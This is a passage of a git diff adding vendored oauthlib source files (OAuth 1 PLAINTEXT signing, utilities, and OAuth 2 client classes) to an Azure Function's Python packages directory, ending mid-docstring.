+ The "PLAINTEXT" method does not employ a signature algorithm. It + MUST be used with a transport-layer mechanism such as TLS or SSL (or + sent over a secure channel with equivalent protections). It does not + utilize the signature base string or the "oauth_timestamp" and + "oauth_nonce" parameters. + + .. _`section 3.4.4`: https://tools.ietf.org/html/rfc5849#section-3.4.4 + + """ + + # The "oauth_signature" protocol parameter is set to the concatenated + # value of: + + # 1. The client shared-secret, after being encoded (`Section 3.6`_). + # + # .. _`Section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6 + signature = utils.escape(client_secret or '') + + # 2. An "&" character (ASCII code 38), which MUST be included even + # when either secret is empty. + signature += '&' + + # 3. The token shared-secret, after being encoded (`Section 3.6`_). + # + # .. _`Section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6 + signature += utils.escape(resource_owner_secret or '') + + return signature + + +def verify_plaintext(request, client_secret=None, resource_owner_secret=None): + """Verify a PLAINTEXT signature. + + Per `section 3.4`_ of the spec. + + .. _`section 3.4`: https://tools.ietf.org/html/rfc5849#section-3.4 + """ + signature = sign_plaintext(client_secret, resource_owner_secret) + match = safe_string_equals(signature, request.signature) + if not match: + log.debug('Verify PLAINTEXT failed') + return match diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/utils.py new file mode 100644 index 0000000..4a382d8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth1/rfc5849/utils.py @@ -0,0 +1,83 @@ +""" +oauthlib.utils +~~~~~~~~~~~~~~ + +This module contains utility methods used by various parts of the OAuth +spec. +""" +import urllib.request as urllib2 + +from oauthlib.common import quote, unquote + +UNICODE_ASCII_CHARACTER_SET = ('abcdefghijklmnopqrstuvwxyz' + 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + '0123456789') + + +def filter_params(target): + """Decorator which filters params to remove non-oauth_* parameters + + Assumes the decorated method takes a params dict or list of tuples as its + first argument. + """ + def wrapper(params, *args, **kwargs): + params = filter_oauth_params(params) + return target(params, *args, **kwargs) + + wrapper.__doc__ = target.__doc__ + return wrapper + + +def filter_oauth_params(params): + """Removes all non oauth parameters from a dict or a list of params.""" + is_oauth = lambda kv: kv[0].startswith("oauth_") + if isinstance(params, dict): + return list(filter(is_oauth, list(params.items()))) + else: + return list(filter(is_oauth, params)) + + +def escape(u): + """Escape a unicode string in an OAuth-compatible fashion. + + Per `section 3.6`_ of the spec. + + .. _`section 3.6`: https://tools.ietf.org/html/rfc5849#section-3.6 + + """ + if not isinstance(u, str): + raise ValueError('Only unicode objects are escapable. ' + + 'Got {!r} of type {}.'.format(u, type(u))) + # Letters, digits, and the characters '_.-' are already treated as safe + # by urllib.quote(). We need to add '~' to fully support rfc5849. + return quote(u, safe=b'~') + + +def unescape(u): + if not isinstance(u, str): + raise ValueError('Only unicode objects are unescapable.') + return unquote(u) + + +def parse_keqv_list(l): + """A unicode-safe version of urllib2.parse_keqv_list""" + # With Python 2.6, parse_http_list handles unicode fine + return urllib2.parse_keqv_list(l) + + +def parse_http_list(u): + """A unicode-safe version of urllib2.parse_http_list""" + # With Python 2.6, parse_http_list handles unicode fine + return urllib2.parse_http_list(u) + + +def parse_authorization_header(authorization_header): + """Parse an OAuth authorization header into a list of 2-tuples""" + auth_scheme = 'OAuth '.lower() + if authorization_header[:len(auth_scheme)].lower().startswith(auth_scheme): + items = parse_http_list(authorization_header[len(auth_scheme):]) + try: + return list(parse_keqv_list(items).items()) + except (IndexError, ValueError): + pass + raise ValueError('Malformed authorization header') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/__init__.py new file mode 100644 index 0000000..f880c02 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/__init__.py @@ -0,0 +1,36 @@ +""" +oauthlib.oauth2 +~~~~~~~~~~~~~~ + +This module is a wrapper for the most recent implementation of OAuth 2.0 Client +and Server classes. +""" +from .rfc6749.clients import ( + BackendApplicationClient, Client, LegacyApplicationClient, + MobileApplicationClient, ServiceApplicationClient, WebApplicationClient, +) +from .rfc6749.endpoints import ( + AuthorizationEndpoint, BackendApplicationServer, IntrospectEndpoint, + LegacyApplicationServer, MetadataEndpoint, MobileApplicationServer, + ResourceEndpoint, RevocationEndpoint, Server, TokenEndpoint, + WebApplicationServer, +) +from .rfc6749.errors import ( + AccessDeniedError, FatalClientError, InsecureTransportError, + InvalidClientError, InvalidClientIdError, InvalidGrantError, + InvalidRedirectURIError, InvalidRequestError, InvalidRequestFatalError, + InvalidScopeError, MismatchingRedirectURIError, MismatchingStateError, + MissingClientIdError, MissingCodeError, MissingRedirectURIError, + MissingResponseTypeError, MissingTokenError, MissingTokenTypeError, + OAuth2Error, ServerError, TemporarilyUnavailableError, TokenExpiredError, + UnauthorizedClientError, UnsupportedGrantTypeError, + UnsupportedResponseTypeError, UnsupportedTokenTypeError, +) +from .rfc6749.grant_types import ( + AuthorizationCodeGrant, ClientCredentialsGrant, ImplicitGrant, + RefreshTokenGrant, ResourceOwnerPasswordCredentialsGrant, +) +from .rfc6749.request_validator import RequestValidator +from .rfc6749.tokens import BearerToken, OAuth2Token +from .rfc6749.utils import is_secure_transport +from .rfc8628.clients import DeviceClient diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..73476c5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__init__.py new file mode 100644 index 0000000..8a251ac --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__init__.py @@ -0,0 +1,16 @@ +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +import functools +import logging + +from .endpoints.base import BaseEndpoint, catch_errors_and_unavailability +from .errors import ( + FatalClientError, OAuth2Error, ServerError, TemporarilyUnavailableError, +) + +log = logging.getLogger(__name__) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..27b923b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/errors.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/errors.cpython-39.pyc new file mode 100644 index 0000000..e33ee19 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/errors.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/parameters.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/parameters.cpython-39.pyc new file mode 100644 index 0000000..f4a340e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/parameters.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/request_validator.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/request_validator.cpython-39.pyc new file mode 100644 index 0000000..fa381df Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/request_validator.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/tokens.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/tokens.cpython-39.pyc new file mode 100644 index 0000000..ac1527a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/tokens.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/utils.cpython-39.pyc new file mode 100644 index 0000000..6f95352 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/__pycache__/utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__init__.py new file mode 100644 index 0000000..4116d2e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__init__.py @@ -0,0 +1,14 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming OAuth 2.0 RFC6749. +""" +from .backend_application import BackendApplicationClient +from .base import AUTH_HEADER, BODY, URI_QUERY, Client +from .legacy_application import LegacyApplicationClient +from .mobile_application import MobileApplicationClient +from .service_application import ServiceApplicationClient +from .web_application import WebApplicationClient diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..ace00dd Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/backend_application.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/backend_application.cpython-39.pyc new file mode 100644 index 0000000..99b8ab0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/backend_application.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/base.cpython-39.pyc new file mode 100644 index 0000000..2c4e49e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/legacy_application.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/legacy_application.cpython-39.pyc new file mode 100644 index 0000000..959baf0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/legacy_application.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/mobile_application.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/mobile_application.cpython-39.pyc new file mode 100644 index 0000000..14edf3a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/mobile_application.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/service_application.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/service_application.cpython-39.pyc new file mode 100644 index 0000000..9f8ec01 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/service_application.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/web_application.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/web_application.cpython-39.pyc new file mode 100644 index 0000000..e1f7f80 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/__pycache__/web_application.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/backend_application.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/backend_application.py new file mode 100644 index 0000000..54b2337 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/backend_application.py @@ -0,0 +1,74 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming and providing OAuth 2.0 RFC6749. +""" +from ..parameters import prepare_token_request +from .base import Client + + +class BackendApplicationClient(Client): + + """A public client utilizing the client credentials grant workflow. + + The client can request an access token using only its client + credentials (or other supported means of authentication) when the + client is requesting access to the protected resources under its + control, or those of another resource owner which has been previously + arranged with the authorization server (the method of which is beyond + the scope of this specification). + + The client credentials grant type MUST only be used by confidential + clients. + + Since the client authentication is used as the authorization grant, + no additional authorization request is needed. + """ + + grant_type = 'client_credentials' + + def prepare_request_body(self, body='', scope=None, + include_client_id=False, **kwargs): + """Add the client credentials to the request body. + + The client makes a request to the token endpoint by adding the + following parameters using the "application/x-www-form-urlencoded" + format per `Appendix B`_ in the HTTP request entity-body: + + :param body: Existing request body (URL encoded string) to embed parameters + into. This may contain extra paramters. Default ''. + :param scope: The scope of the access request as described by + `Section 3.3`_. + + :param include_client_id: `True` to send the `client_id` in the + body of the upstream request. This is required + if the client is not authenticating with the + authorization server as described in + `Section 3.2.1`_. False otherwise (default). + :type include_client_id: Boolean + + :param kwargs: Extra credentials to include in the token request. + + The client MUST authenticate with the authorization server as + described in `Section 3.2.1`_. + + The prepared body will include all provided credentials as well as + the ``grant_type`` parameter set to ``client_credentials``:: + + >>> from oauthlib.oauth2 import BackendApplicationClient + >>> client = BackendApplicationClient('your_id') + >>> client.prepare_request_body(scope=['hello', 'world']) + 'grant_type=client_credentials&scope=hello+world' + + .. _`Appendix B`: https://tools.ietf.org/html/rfc6749#appendix-B + .. _`Section 3.3`: https://tools.ietf.org/html/rfc6749#section-3.3 + .. _`Section 3.2.1`: https://tools.ietf.org/html/rfc6749#section-3.2.1 + """ + kwargs['client_id'] = self.client_id + kwargs['include_client_id'] = include_client_id + scope = self.scope if scope is None else scope + return prepare_token_request(self.grant_type, body=body, + scope=scope, **kwargs) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/base.py new file mode 100644 index 0000000..6df33cb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/oauth2/rfc6749/clients/base.py @@ -0,0 +1,629 @@ +# -*- coding: utf-8 -*- +""" +oauthlib.oauth2.rfc6749 +~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of various logic needed +for consuming OAuth 2.0 RFC6749. +""" +import time +import warnings +import secrets +import re +import hashlib +import base64 + +from oauthlib.common import generate_token +from oauthlib.oauth2.rfc6749 import tokens +from oauthlib.oauth2.rfc6749.errors import ( + InsecureTransportError, TokenExpiredError, +) +from oauthlib.oauth2.rfc6749.parameters import ( + parse_token_response, prepare_token_request, + prepare_token_revocation_request, +) +from oauthlib.oauth2.rfc6749.utils import is_secure_transport + +AUTH_HEADER = 'auth_header' +URI_QUERY = 'query' +BODY = 'body' + +FORM_ENC_HEADERS = { + 'Content-Type': 'application/x-www-form-urlencoded' +} + + +class Client: + """Base OAuth2 client responsible for access token management. + + This class also acts as a generic interface providing methods common to all + client types such as ``prepare_authorization_request`` and + ``prepare_token_revocation_request``. The ``prepare_x_request`` methods are + the recommended way of interacting with clients (as opposed to the abstract + prepare uri/body/etc methods). They are recommended over the older set + because they are easier to use (more consistent) and add a few additional + security checks, such as HTTPS and state checking. + + Some of these methods require further implementation only provided by the + specific purpose clients such as + :py:class:`oauthlib.oauth2.MobileApplicationClient` and thus you should always + seek to use the client class matching the OAuth workflow you need. For + Python, this is usually :py:class:`oauthlib.oauth2.WebApplicationClient`. + + """ + refresh_token_key = 'refresh_token' + + def __init__(self, client_id, + default_token_placement=AUTH_HEADER, + token_type='Bearer', + access_token=None, + refresh_token=None, + mac_key=None, + mac_algorithm=None, + token=None, + scope=None, + state=None, + redirect_url=None, + state_generator=generate_token, + code_verifier=None, + code_challenge=None, + code_challenge_method=None, + **kwargs): + """Initialize a client with commonly used attributes. + + :param client_id: Client identifier given by the OAuth provider upon + registration. + + :param default_token_placement: Tokens can be supplied in the Authorization + header (default), the URL query component (``query``) or the request + body (``body``). + + :param token_type: OAuth 2 token type. Defaults to Bearer. Change this + if you specify the ``access_token`` parameter and know it is of a + different token type, such as a MAC, JWT or SAML token. Can + also be supplied as ``token_type`` inside the ``token`` dict parameter. + + :param access_token: An access token (string) used to authenticate + requests to protected resources. Can also be supplied inside the + ``token`` dict parameter. + + :param refresh_token: A refresh token (string) used to refresh expired + tokens. Can also be supplied inside the ``token`` dict parameter. + + :param mac_key: Encryption key used with MAC tokens. + + :param mac_algorithm: Hashing algorithm for MAC tokens. + + :param token: A dict of token attributes such as ``access_token``, + ``token_type`` and ``expires_at``. + + :param scope: A list of default scopes to request authorization for. + + :param state: A CSRF protection string used during authorization. + + :param redirect_url: The redirection endpoint on the client side to which + the user returns after authorization. + + :param state_generator: A no argument state generation callable. Defaults + to :py:meth:`oauthlib.common.generate_token`. + + :param code_verifier: PKCE parameter. A cryptographically random string that is used to correlate the + authorization request to the token request. + + :param code_challenge: PKCE parameter. A challenge derived from the code verifier that is sent in the + authorization request, to be verified against later. + + :param code_challenge_method: PKCE parameter. A method that was used to derive code challenge. + Defaults to "plain" if not present in the request. + """ + + self.client_id = client_id + self.default_token_placement = default_token_placement + self.token_type = token_type + self.access_token = access_token + self.refresh_token = refresh_token + self.mac_key = mac_key + self.mac_algorithm = mac_algorithm + self.token = token or {} + self.scope = scope + self.state_generator = state_generator + self.state = state + self.redirect_url = redirect_url + self.code_verifier = code_verifier + self.code_challenge = code_challenge + self.code_challenge_method = code_challenge_method + self.code = None + self.expires_in = None + self._expires_at = None + self.populate_token_attributes(self.token) + + @property + def token_types(self): + """Supported token types and their respective methods + + Additional tokens can be supported by extending this dictionary. + + The Bearer token spec is stable and safe to use. + + The MAC token spec is not yet stable and support for MAC tokens + is experimental and currently matching version 00 of the spec. + """ + return { + 'Bearer': self._add_bearer_token, + 'MAC': self._add_mac_token + } + + def prepare_request_uri(self, *args, **kwargs): + """Abstract method used to create request URIs.""" + raise NotImplementedError("Must be implemented by inheriting classes.") + + def prepare_request_body(self, *args, **kwargs): + """Abstract method used to create request bodies.""" + raise NotImplementedError("Must be implemented by inheriting classes.") + + def parse_request_uri_response(self, *args, **kwargs): + """Abstract method used to parse redirection responses.""" + raise NotImplementedError("Must be implemented by inheriting classes.") + + def add_token(self, uri, http_method='GET', body=None, headers=None, + token_placement=None, **kwargs): + """Add token to the request uri, body or authorization header. + + The access token type provides the client with the information + required to successfully utilize the access token to make a protected + resource request (along with type-specific attributes). The client + MUST NOT use an access token if it does not understand the token + type. + + For example, the "bearer" token type defined in + [`I-D.ietf-oauth-v2-bearer`_] is utilized by simply including the access + token string in the request: + + .. code-block:: http + + GET /resource/1 HTTP/1.1 + Host: example.com + Authorization: Bearer mF_9.B5f-4.1JqM + + while the "mac" token type defined in [`I-D.ietf-oauth-v2-http-mac`_] is + utilized by issuing a MAC key together with the access token which is + used to sign certain components of the HTTP requests: + + .. code-block:: http + + GET /resource/1 HTTP/1.1 + Host: example.com + Authorization: MAC id="h480djs93hd8", + nonce="274312:dj83hs9s", + mac="kDZvddkndxvhGRXZhvuDjEWhGeE=" + + .. _`I-D.ietf-oauth-v2-bearer`: https://tools.ietf.org/html/rfc6749#section-12.2 + .. _`I-D.ietf-oauth-v2-http-mac`: https://tools.ietf.org/html/rfc6749#section-12.2 + """ + if not is_secure_transport(uri): + raise InsecureTransportError() + + token_placement = token_placement or self.default_token_placement + + case_insensitive_token_types = { + k.lower(): v for k, v in self.token_types.items()} + if not self.token_type.lower() in case_insensitive_token_types: + raise ValueError("Unsupported token type: %s" % self.token_type) + + if not (self.access_token or self.token.get('access_token')): + raise ValueError("Missing access token.") + + if self._expires_at and self._expires_at < time.time(): + raise TokenExpiredError() + + return case_insensitive_token_types[self.token_type.lower()](uri, http_method, body, + headers, token_placement, **kwargs) + + def prepare_authorization_request(self, authorization_url, state=None, + redirect_url=None, scope=None, **kwargs): + """Prepare the authorization request. + + This is the first step in many OAuth flows in which the user is + redirected to a certain authorization URL. This method adds + required parameters to the authorization URL. + + :param authorization_url: Provider authorization endpoint URL. + + :param state: CSRF protection string. Will be automatically created if + not provided. The generated state is available via the ``state`` + attribute. Clients should verify that the state is unchanged and + present in the authorization response. This verification is done + automatically if using the ``authorization_response`` parameter + with ``prepare_token_request``. + + :param redirect_url: Redirect URL to which the user will be returned + after authorization. Must be provided unless previously setup with + the provider. If provided then it must also be provided in the + token request. + + :param scope: List of scopes to request. Must be equal to + or a subset of the scopes granted when obtaining the refresh + token. If none is provided, the ones provided in the constructor are + used. + + :param kwargs: Additional parameters to included in the request. + + :returns: The prepared request tuple with (url, headers, body). + """ + if not is_secure_transport(authorization_url): + raise InsecureTransportError() + + self.state = state or self.state_generator() + self.redirect_url = redirect_url or self.redirect_url + # do not assign scope to self automatically anymore + scope = self.scope if scope is None else scope + auth_url = self.prepare_request_uri( + authorization_url, redirect_uri=self.redirect_url, + scope=scope, state=self.state, **kwargs) + return auth_url, FORM_ENC_HEADERS, '' + + def prepare_token_request(self, token_url, authorization_response=None, + redirect_url=None, state=None, body='', **kwargs): + """Prepare a token creation request. + + Note that these requests usually require client authentication, either + by including client_id or a set of provider specific authentication + credentials. + + :param token_url: Provider token creation endpoint URL. + + :param authorization_response: The full redirection URL string, i.e. + the location to which the user was redirected after successfull + authorization. Used to mine credentials needed to obtain a token + in this step, such as authorization code. + + :param redirect_url: The redirect_url supplied with the authorization + request (if there was one). + + :param state: + + :param body: Existing request body (URL encoded string) to embed parameters + into. This may contain extra paramters. Default ''. + + :param kwargs: Additional parameters to included in the request. + + :returns: The prepared request tuple with (url, headers, body). + """ + if not is_secure_transport(token_url): + raise InsecureTransportError() + + state = state or self.state + if authorization_response: + self.parse_request_uri_response( + authorization_response, state=state) + self.redirect_url = redirect_url or self.redirect_url + body = self.prepare_request_body(body=body, + redirect_uri=self.redirect_url, **kwargs) + + return token_url, FORM_ENC_HEADERS, body + + def prepare_refresh_token_request(self, token_url, refresh_token=None, + body='', scope=None, **kwargs): + """Prepare an access token refresh request. + + Expired access tokens can be replaced by new access tokens without + going through the OAuth dance if the client obtained a refresh token. + This refresh token and authentication credentials can be used to + obtain a new access token, and possibly a new refresh token. + + :param token_url: Provider token refresh endpoint URL. + + :param refresh_token: Refresh token string. + + :param body: Existing request body (URL encoded string) to embed parameters + into. This may contain extra paramters. Default ''. + + :param scope: List of scopes to request. Must be equal to + or a subset of the scopes granted when obtaining the refresh + token. If none is provided, the ones provided in the constructor are + used. + + :param kwargs: Additional parameters to included in the request. + + :returns: The prepared request tuple with (url, headers, body). + """ + if not is_secure_transport(token_url): + raise InsecureTransportError() + + # do not assign scope to self automatically anymore + scope = self.scope if scope is None else scope + body = self.prepare_refresh_body(body=body, + refresh_token=refresh_token, scope=scope, **kwargs) + return token_url, FORM_ENC_HEADERS, body + + def prepare_token_revocation_request(self, revocation_url, token, + token_type_hint="access_token", body='', callback=None, **kwargs): + """Prepare a token revocation request. + + :param revocation_url: Provider token revocation endpoint URL. + + :param token: The access or refresh token to be revoked (string). + + :param token_type_hint: ``"access_token"`` (default) or + ``"refresh_token"``. This is optional and if you wish to not pass it you + must provide ``token_type_hint=None``. + + :param body: + + :param callback: A jsonp callback such as ``package.callback`` to be invoked + upon receiving the response. Not that it should not include a () suffix. + + :param kwargs: Additional parameters to included in the request. + + :returns: The prepared request tuple with (url, headers, body). + + Note that JSONP request may use GET requests as the parameters will + be added to the request URL query as opposed to the request body. + + An example of a revocation request + + .. code-block: http + + POST /revoke HTTP/1.1 + Host: server.example.com + Content-Type: application/x-www-form-urlencoded + Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW + + token=45ghiukldjahdnhzdauz&token_type_hint=refresh_token + + An example of a jsonp revocation request + + .. code-block: http + + GET /revoke?token=agabcdefddddafdd&callback=package.myCallback HTTP/1.1 + Host: server.example.com + Content-Type: application/x-www-form-urlencoded + Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW + + and an error response + + .. code-block: http + + package.myCallback({"error":"unsupported_token_type"}); + + Note that these requests usually require client credentials, client_id in + the case for public clients and provider specific authentication + credentials for confidential clients. + """ + if not is_secure_transport(revocation_url): + raise InsecureTransportError() + + return prepare_token_revocation_request(revocation_url, token, + token_type_hint=token_type_hint, body=body, callback=callback, + **kwargs) + + def parse_request_body_response(self, body, scope=None, **kwargs): + """Parse the JSON response body. + + If the access token request is valid and authorized, the + authorization server issues an access token as described in + `Section 5.1`_. A refresh token SHOULD NOT be included. If the request + failed client authentication or is invalid, the authorization server + returns an error response as described in `Section 5.2`_. + + :param body: The response body from the token request. + :param scope: Scopes originally requested. If none is provided, the ones + provided in the constructor are used. + :return: Dictionary of token parameters. + :raises: Warning if scope has changed. OAuth2Error if response is invalid. + + These response are json encoded and could easily be parsed without + the assistance of OAuthLib. However, there are a few subtle issues + to be aware of regarding the response which are helpfully addressed + through the raising of various errors. + + A successful response should always contain + + **access_token** + The access token issued by the authorization server. Often + a random string. + + **token_type** + The type of the token issued as described in `Section 7.1`_. + Commonly ``Bearer``. + + While it is not mandated it is recommended that the provider include + + **expires_in** + The lifetime in seconds of the access token. For + example, the value "3600" denotes that the access token will + expire in one hour from the time the response was generated. + If omitted, the authorization server SHOULD provide the + expiration time via other means or document the default value. + + **scope** + Providers may supply this in all responses but are required to only + if it has changed since the authorization request. + + .. _`Section 5.1`: https://tools.ietf.org/html/rfc6749#section-5.1 + .. _`Section 5.2`: https://tools.ietf.org/html/rfc6749#section-5.2 + .. _`Section 7.1`: https://tools.ietf.org/html/rfc6749#section-7.1 + """ + scope = self.scope if scope is None else scope + self.token = parse_token_response(body, scope=scope) + self.populate_token_attributes(self.token) + return self.token + + def prepare_refresh_body(self, body='', refresh_token=None, scope=None, **kwargs): + """Prepare an access token request, using a refresh token. + + If the authorization server issued a refresh token to the client, the + client makes a refresh request to the token endpoint by adding the + following parameters using the "application/x-www-form-urlencoded" + format in the HTTP request entity-body: + + grant_type + REQUIRED. Value MUST be set to "refresh_token". + refresh_token + REQUIRED. The refresh token issued to the client. + scope + OPTIONAL. The scope of the access request as described by + Section 3.3. The requested scope MUST NOT include any scope + not originally granted by the resource owner, and if omitted is + treated as equal to the scope originally granted by the + resource owner. Note that if none is provided, the ones provided + in the constructor are used if any. + """ + refresh_token = refresh_token or self.refresh_token + scope = self.scope if scope is None else scope + return prepare_token_request(self.refresh_token_key, body=body, scope=scope, + refresh_token=refresh_token, **kwargs) + + def _add_bearer_token(self, uri, http_method='GET', body=None, + headers=None, token_placement=None): + """Add a bearer token to the request uri, body or authorization header.""" + if token_placement == AUTH_HEADER: + headers = tokens.prepare_bearer_headers(self.access_token, headers) + + elif token_placement == URI_QUERY: + uri = tokens.prepare_bearer_uri(self.access_token, uri) + + elif token_placement == BODY: + body = tokens.prepare_bearer_body(self.access_token, body) + + else: + raise ValueError("Invalid token placement.") + return uri, headers, body + + def create_code_verifier(self, length): + """Create PKCE **code_verifier** used in computing **code_challenge**. + + :param length: REQUIRED. The length of the code_verifier. + + The client first 